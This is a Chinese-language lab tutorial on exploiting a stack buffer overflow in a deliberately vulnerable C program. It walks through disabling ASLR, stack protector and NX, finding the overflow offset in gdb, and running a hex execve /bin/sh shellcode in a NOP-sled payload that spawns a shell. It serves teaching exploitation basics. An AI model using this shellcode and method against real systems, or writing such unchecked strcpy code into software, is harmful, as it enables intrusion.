csep@ubuntu:~/src$ cat samp1.c為了能夠順利練習,需要先關閉Stack Guard、Stack Space Randomization以及Non Executable Stack
#include
#include
int main(int argc, char** argv){
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
1. 關閉Stack Space Randomization
root@ubuntu:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@ubuntu:~# cat /proc/sys/kernel/randomize_va_space
0
2. 關閉Stack Guard,在gcc compile時加上參數
gcc -g -o samp1 samp1.c -fno-stack-protector
3. 關閉Non Executable Stack,需要額外把NX bit關掉
user@ubuntu:~/src$ sudo apt-get install execstack
...
user@ubuntu:~/src$ execstack -s samp1
4. 執行GDB開始Buffer Overflow
csep@ubuntu:~/src$ gdb -q samp1可以看到長度約在504之後會寫到EIP,接著看ESP在大概在哪。
Reading symbols from /home/csep/src/samp1...done.
(gdb) run `python -c 'print "\x41"*500'`Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*500'`
Program exited normally.
(gdb) run `python -c 'print "\x41"*520'`
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*520'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*512'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*512'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*508'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*508'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `python -c 'print "\x41"*504'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*504'`
Program received signal SIGILL, Illegal instruction.
0xbffff67a in ?? ()
(gdb) run `python -c 'print "\x41"*504'`
(gdb) list從ESP往回算約300,就是要覆寫的ret address。
1 #include
2 #include
3
4 int main(int argc, char** argv){
5 char buffer[500];
6 strcpy(buffer, argv[1]); // Vulnerable Function
7 return 0;
8 }
(gdb) b 6
Breakpoint 1 at 0x80483cd: file samp1.c, line 6.
(gdb) run `python -c 'print "\x41"*508'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x41"*508'`
Breakpoint 1, main (argc=2, argv=0xbffff604) at samp1.c:6
6 strcpy(buffer, argv[1]); // Vulnerable Function
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r esp
esp 0xbffff560 0xbffff560
(gdb) p /x 0xbffff560 - 300
$3 = 0xbffff434
接著就準備shell code,參考連結。
csep@ubuntu:~/src$ ./sc-gen sh大致上準備好了,可以Buffer Overflow了。要送出的參數長這樣
Shellcode lenght: 54
\x31\xc0\x83\xec\x01\x88\x04\x24
\x68\x74\x72\x69\x62\x68\x2e\x64
\x69\x73\x68\x6e\x2f\x73\x68\x66
\x68\x62\x69\x83\xec\x01\xc6\x04
\x24\x2f\x89\xe6\x50\x56\xb0\x0b
\x89\xf3\x89\xe1\x31\xd2\xcd\x80
\xb0\x01\x31\xdb\xcd\x80
csep@ubuntu:~/src$ for line in `./sc-gen sh | grep "x"`; do echo -n $line; done\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
[NOP-------] [shell Code] [return Address----]
^--------------------------------------'
只要return address位於NOP中,就可以順利執行Shell Code了。
(gdb) run `python -c 'print "\x90"*302+"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+"\xc4\xf3\xff\xbf"*38'`Boom! 拿到Shell了。
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/csep/src/samp1 `python -c 'print "\x90"*302+"\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x74\x72\x69\x62\x68\x2e\x64\x69\x73\x68\x6e\x2f\x73\x68\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"+"\xc4\xf3\xff\xbf"*38'`
Breakpoint 1, main (argc=2, argv=0xbffff604) at samp1.c:6
6 strcpy(buffer, argv[1]); // Vulnerable Function
(gdb) c
Continuing.
process 13123 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
To run a command as administrator (user "root"), use "sudo".
See "man sudo_root" for details.
csep@ubuntu:/home/csep/src$
